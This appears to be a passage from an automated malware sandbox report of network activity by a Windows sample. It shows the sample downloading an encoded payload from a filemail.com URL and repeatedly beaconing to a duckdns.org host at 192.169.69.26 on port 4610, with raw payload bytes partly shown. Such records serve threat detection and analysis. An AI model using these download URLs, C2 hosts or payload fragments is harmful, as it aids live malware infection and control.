                                      Dec 17, 2024 19:47:05.325907946 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.325918913 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.325948954 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.328763962 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.328834057 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.328840971 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.330513000 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.330579996 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.330585957 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.332616091 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.332689047 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.332696915 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.335036993 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.335104942 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.335110903 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.337268114 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.337327957 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.337335110 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.339153051 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.339222908 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.339230061 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.341625929 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.341710091 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.341717005 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.343873024 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.343940973 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.343946934 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.346108913 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.346169949 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.346175909 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.348481894 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.348547935 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.348555088 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.350589991 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.350661993 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.350668907 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.352688074 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.352756977 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.352763891 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.354619980 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.354701042 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.354707003 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.397998095 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.514573097 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.514591932 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.514722109 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.514739990 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.515886068 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.515896082 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.515973091 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.515980005 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.518784046 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.518821955 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.518857956 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.518865108 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.518897057 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.520657063 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.520726919 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.520733118 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.522522926 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.522594929 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.522602081 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.525063038 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.525139093 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.525144100 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.527170897 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.527252913 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.527259111 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.529145002 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.529217958 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.529225111 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.529264927 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.530523062 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.530553102 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.530869961 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.530878067 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:08.017988920 CET497104610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:08.137810946 CET461049710192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:47:08.137902975 CET497104610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:08.143982887 CET497104610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:08.264162064 CET461049710192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:47:18.569988012 CET461049710192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:47:18.570060968 CET497104610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:18.570183039 CET497104610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:18.694228888 CET461049710192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:47:21.665664911 CET497424610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:21.785353899 CET461049742192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:47:21.785438061 CET497424610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:21.789201021 CET497424610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:21.909324884 CET461049742192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:47:32.134886026 CET461049742192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:47:32.137547970 CET497424610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:32.137620926 CET497424610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:32.260754108 CET461049742192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:47:35.170780897 CET497764610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:35.325922012 CET461049776192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:47:35.326020002 CET497764610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:35.329478025 CET497764610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:35.497773886 CET461049776192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:47:45.658214092 CET461049776192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:47:45.660104036 CET497764610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:45.660239935 CET497764610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:45.783026934 CET461049776192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:47:48.701976061 CET498084610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:48.823894024 CET461049808192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:47:48.824577093 CET498084610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:48.828341961 CET498084610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:48.955950975 CET461049808192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:47:59.101320982 CET461049808192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:47:59.101670027 CET498084610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:59.101747036 CET498084610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:47:59.223436117 CET461049808192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:02.123955011 CET498414610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:02.246174097 CET461049841192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:02.246345043 CET498414610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:02.249447107 CET498414610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:02.371344090 CET461049841192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:12.620418072 CET461049841192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:12.620563984 CET498414610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:12.620563984 CET498414610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:12.740291119 CET461049841192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:15.987104893 CET498744610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:16.106975079 CET461049874192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:16.109658957 CET498744610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:16.134145975 CET498744610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:16.258913040 CET461049874192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:26.454107046 CET461049874192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:26.454189062 CET498744610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:26.454231024 CET498744610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:26.579391003 CET461049874192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:29.503026009 CET499074610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:29.628911018 CET461049907192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:29.630283117 CET499074610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:29.633819103 CET499074610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:29.760441065 CET461049907192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:40.015388012 CET461049907192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:40.016570091 CET499074610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:40.016658068 CET499074610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:40.136569023 CET461049907192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:43.062271118 CET499394610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:43.187949896 CET461049939192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:43.188090086 CET499394610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:43.191747904 CET499394610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:43.348973989 CET461049939192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:53.595387936 CET461049939192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:53.595546007 CET499394610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:53.595614910 CET499394610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:53.729531050 CET461049939192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:56.655987978 CET499724610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:56.776422024 CET461049972192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:48:56.776540041 CET499724610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:56.780046940 CET499724610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:48:56.901653051 CET461049972192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:49:07.184945107 CET461049972192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:49:07.185091019 CET499724610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:07.185091019 CET499724610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:07.305593967 CET461049972192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:49:10.202740908 CET500044610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:10.322530031 CET461050004192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:49:10.322606087 CET500044610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:10.325922966 CET500044610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:10.448936939 CET461050004192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:49:20.695693016 CET461050004192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:49:20.695745945 CET500044610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:20.695843935 CET500044610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:20.817862034 CET461050004192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:49:24.071753979 CET500074610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:24.191473007 CET461050007192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:49:24.194070101 CET500074610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:24.196949959 CET500074610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:24.317509890 CET461050007192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:49:34.536472082 CET461050007192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:49:34.539024115 CET500074610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:34.539133072 CET500074610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:34.659811020 CET461050007192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:49:37.781382084 CET500094610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:37.903603077 CET461050009192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:49:37.903698921 CET500094610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:37.907094002 CET500094610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:38.031493902 CET461050009192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:49:48.249913931 CET461050009192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:49:48.249995947 CET500094610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:48.250066996 CET500094610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:48.369609118 CET461050009192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:49:51.314369917 CET500114610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:51.435297966 CET461050011192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:49:51.439220905 CET500114610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:51.447117090 CET500114610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:49:51.567785978 CET461050011192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:01.811728954 CET461050011192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:01.813405991 CET500114610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:01.819250107 CET500114610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:01.938910961 CET461050011192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:04.875597000 CET500134610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:04.995498896 CET461050013192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:04.995699883 CET500134610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:05.000420094 CET500134610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:05.121066093 CET461050013192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:15.367434025 CET461050013192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:15.367649078 CET500134610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:15.368544102 CET500134610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:15.495199919 CET461050013192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:18.406536102 CET500154610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:18.531768084 CET461050015192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:18.532298088 CET500154610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:18.535850048 CET500154610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:18.662600040 CET461050015192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:28.913590908 CET461050015192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:28.914989948 CET500154610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:28.915071964 CET500154610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:29.034894943 CET461050015192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:32.269304991 CET500174610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:32.390263081 CET461050017192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:32.390377045 CET500174610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:32.394212961 CET500174610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:32.513983965 CET461050017192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:42.759057045 CET461050017192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:42.759116888 CET500174610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:42.759186029 CET500174610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:42.880100965 CET461050017192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:45.781738043 CET500194610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:45.901478052 CET461050019192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:45.901577950 CET500194610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:45.906626940 CET500194610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:46.029866934 CET461050019192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:56.293520927 CET461050019192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:56.293613911 CET500194610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:56.293698072 CET500194610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:56.414061069 CET461050019192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:59.328856945 CET500224610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:59.449410915 CET461050022192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:50:59.455353975 CET500224610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:59.455353975 CET500224610192.168.2.6192.169.69.26
                                      Dec 17, 2024 19:50:59.575117111 CET461050022192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:51:09.722042084 CET461050022192.169.69.26192.168.2.6
                                      Dec 17, 2024 19:51:09.722194910 CET500224610192.168.2.6192.169.69.26

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 17, 2024 19:47:00.802445889 CET6323053192.168.2.61.1.1.1
                                      Dec 17, 2024 19:47:01.233530045 CET53632301.1.1.1192.168.2.6
                                      Dec 17, 2024 19:47:07.687659979 CET5502553192.168.2.61.1.1.1
                                      Dec 17, 2024 19:47:08.015021086 CET53550251.1.1.1192.168.2.6
                                      Dec 17, 2024 19:48:15.654836893 CET5632353192.168.2.61.1.1.1
                                      Dec 17, 2024 19:48:15.977806091 CET53563231.1.1.1192.168.2.6
                                      Dec 17, 2024 19:49:23.749764919 CET5134353192.168.2.61.1.1.1
                                      Dec 17, 2024 19:49:24.070266008 CET53513431.1.1.1192.168.2.6
                                      Dec 17, 2024 19:50:31.953363895 CET5156453192.168.2.61.1.1.1
                                      Dec 17, 2024 19:50:32.268501997 CET53515641.1.1.1192.168.2.6

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Dec 17, 2024 19:47:00.802445889 CET192.168.2.61.1.1.10xcf1bStandard query (0)1010.filemail.comA (IP address)IN (0x0001)false
                                      Dec 17, 2024 19:47:07.687659979 CET192.168.2.61.1.1.10x5d17Standard query (0)hafiznor3374.duckdns.orgA (IP address)IN (0x0001)false
                                      Dec 17, 2024 19:48:15.654836893 CET192.168.2.61.1.1.10xab35Standard query (0)hafiznor3374.duckdns.orgA (IP address)IN (0x0001)false
                                      Dec 17, 2024 19:49:23.749764919 CET192.168.2.61.1.1.10x3b63Standard query (0)hafiznor3374.duckdns.orgA (IP address)IN (0x0001)false
                                      Dec 17, 2024 19:50:31.953363895 CET192.168.2.61.1.1.10xd650Standard query (0)hafiznor3374.duckdns.orgA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Dec 17, 2024 19:47:01.233530045 CET1.1.1.1192.168.2.60xcf1bNo error (0)1010.filemail.comip.1010.filemail.comCNAME (Canonical name)IN (0x0001)false
                                      Dec 17, 2024 19:47:01.233530045 CET1.1.1.1192.168.2.60xcf1bNo error (0)ip.1010.filemail.com23.237.50.106A (IP address)IN (0x0001)false
                                      Dec 17, 2024 19:47:08.015021086 CET1.1.1.1192.168.2.60x5d17No error (0)hafiznor3374.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                      Dec 17, 2024 19:48:15.977806091 CET1.1.1.1192.168.2.60xab35No error (0)hafiznor3374.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                      Dec 17, 2024 19:49:24.070266008 CET1.1.1.1192.168.2.60x3b63No error (0)hafiznor3374.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                      Dec 17, 2024 19:50:32.268501997 CET1.1.1.1192.168.2.60xd650No error (0)hafiznor3374.duckdns.org192.169.69.26A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • 1010.filemail.com

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.64970823.237.50.106443768C:\Users\user\Desktop\MeP66xi1AM.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-17 18:47:03 UTC278OUTGET /api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPyEiYgd91YNEpA&pk_vid=78e1a7301010f2bb173426329896c326 HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept: */*
                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                      Host: 1010.filemail.com
                                      2024-12-17 18:47:03 UTC339INHTTP/1.1 200 OK
                                      Content-Length: 1082036
                                      Content-Type: application/octet-stream
                                      Last-Modified: Sun, 15 Dec 2024 11:48:03 GMT
                                      Accept-Ranges: bytes
                                      ETag: 63d5509024e920f6991de1238388cb63
                                      X-Transfer-ID: miynsztpjshogko
                                      Content-Disposition: attachment; filename=233_Wnbcdrjtnox
                                      Date: Tue, 17 Dec 2024 18:47:03 GMT
                                      Connection: close
                                      2024-12-17 18:47:03 UTC1658INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 55 46 42 55 5a 48 79 51 5a 4a 53 59 51 45 42 45 66 45 68 77 56 46 52 73 57 45 43 55 6d 4a 69 55 6b 49 79 59 55 46 42 77 64 4a 52 41 57 48 69 55 6a 46 78 51 62 49 43 45 61 44 68 4d 6c 4a 42 49 58 4a 42 30 62 48 42 55 53 49 78 73 6e 46 78 34 59 48 53 55 56 4a 69 49 68 44 78 6b 58 4a 52 38 4f 70 71 36 6c 57 53 4f 6e 73 55 73 45 47 77 38 51 45 52 38 58 49 52 73 63 4a 61 61 75 70 56 6b 6a 70 37 46 4c 7a 73 37 5a 31 63 4f 2b 31 63 6e 49 30 74 4c 4e 77 38 7a 57 32 64 6e 58 32 4e 4c 4a 79 4d 6a 4a 76 72 2f 49 7a 73 37 57 77 63 6e 53 32 4d 44 4a 76 39 76 4f 31 38 4b 39 31 4e 44 50 79 62 37 4d 32 37 37 42 31 39 62 5a 7a 4c 2f 58 79 39 76 41 32 73 48 4a 32 63 69 38 76 64 50 56 32 38 6e 44 30 4d 37 4f 32 64 58 44 76 74 58 4a 79 4e 4c
                                      Data Ascii: pq6lWSOnsUsUFBUZHyQZJSYQEBEfEhwVFRsWECUmJiUkIyYUFBwdJRAWHiUjFxQbICEaDhMlJBIXJB0bHBUSIxsnFx4YHSUVJiIhDxkXJR8Opq6lWSOnsUsEGw8QER8XIRscJaaupVkjp7FLzs7Z1cO+1cnI0tLNw8zW2dnX2NLJyMjJvr/Izs7WwcnS2MDJv9vO18K91NDPyb7M277B19bZzL/Xy9vA2sHJ2ci8vdPV28nD0M7O2dXDvtXJyNL
                                      2024-12-17 18:47:03 UTC8192INData Raw: 38 6c 35 64 35 4f 79 4d 6c 4a 5a 4e 6e 4e 70 59 6f 6c 7a 46 33 4b 76 6d 35 47 4d 47 70 7a 74 7a 55 69 59 6a 64 73 2b 46 32 30 6f 61 53 47 63 31 74 33 68 4a 77 69 38 6d 4b 50 35 37 78 72 67 35 42 63 43 32 72 57 30 6b 7a 4b 4a 49 32 55 58 75 6c 49 42 58 2b 46 7a 67 4c 34 79 66 78 4a 4b 68 6d 36 4e 4f 68 46 58 2f 61 39 69 74 30 73 30 64 6b 35 48 38 77 68 4e 43 47 50 6e 71 77 4b 70 44 6e 6a 44 69 38 43 31 7a 4b 78 59 64 67 6d 47 2b 76 62 50 79 41 67 33 55 43 6a 41 2f 66 66 6b 56 37 35 36 6c 69 65 5a 53 4a 53 44 31 50 6a 46 31 51 35 7a 63 42 6c 41 64 70 72 38 4f 53 78 75 79 74 7a 77 52 52 52 47 33 64 45 62 2f 35 6d 46 72 61 52 64 44 49 69 42 48 42 7a 71 68 51 78 50 73 41 79 34 73 45 54 48 65 55 30 68 48 63 55 39 38 4e 42 44 76 6a 6e 70 78 67 57 53 61 55 50 56
                                      Data Ascii: 8l5d5OyMlJZNnNpYolzF3Kvm5GMGpztzUiYjds+F20oaSGc1t3hJwi8mKP57xrg5BcC2rW0kzKJI2UXulIBX+FzgL4yfxJKhm6NOhFX/a9it0s0dk5H8whNCGPnqwKpDnjDi8C1zKxYdgmG+vbPyAg3UCjA/ffkV756lieZSJSD1PjF1Q5zcBlAdpr8OSxuytzwRRRG3dEb/5mFraRdDIiBHBzqhQxPsAy4sETHeU0hHcU98NBDvjnpxgWSaUPV
                                      2024-12-17 18:47:03 UTC8192INData Raw: 62 45 2f 41 75 46 4e 74 36 49 75 7a 38 30 37 37 68 36 49 39 70 6b 7a 78 30 32 71 4e 52 69 70 47 51 64 66 6f 4e 51 32 41 57 70 49 72 5a 50 71 4b 51 38 42 79 52 66 59 6b 35 6d 55 74 34 77 6c 44 52 51 4e 4c 2b 6c 71 4f 49 31 58 35 39 4b 6b 41 44 43 4f 75 51 73 55 43 46 4d 75 71 2f 68 59 33 47 58 48 5a 39 5a 69 43 46 48 53 4f 36 7a 39 4b 34 64 75 33 5a 79 4d 4c 57 46 55 52 61 37 6f 54 76 41 32 54 75 37 41 32 69 7a 62 38 37 46 4a 51 72 70 77 6f 64 43 66 59 6a 70 33 71 71 4a 44 39 76 4f 59 6f 53 45 75 5a 43 39 4d 74 79 48 2f 65 32 54 41 47 76 4b 51 52 31 65 68 52 73 44 54 77 67 4c 56 38 6c 62 30 6a 2b 4d 6f 33 4d 31 6d 48 73 49 4f 58 66 36 2b 44 34 30 4b 59 6b 76 32 71 4d 71 45 71 57 41 6a 65 41 38 43 67 38 4f 35 6a 56 55 44 51 61 37 47 5a 2b 32 58 31 62 4b 51
                                      Data Ascii: bE/AuFNt6Iuz8077h6I9pkzx02qNRipGQdfoNQ2AWpIrZPqKQ8ByRfYk5mUt4wlDRQNL+lqOI1X59KkADCOuQsUCFMuq/hY3GXHZ9ZiCFHSO6z9K4du3ZyMLWFURa7oTvA2Tu7A2izb87FJQrpwodCfYjp3qqJD9vOYoSEuZC9MtyH/e2TAGvKQR1ehRsDTwgLV8lb0j+Mo3M1mHsIOXf6+D40KYkv2qMqEqWAjeA8Cg8O5jVUDQa7GZ+2X1bKQ
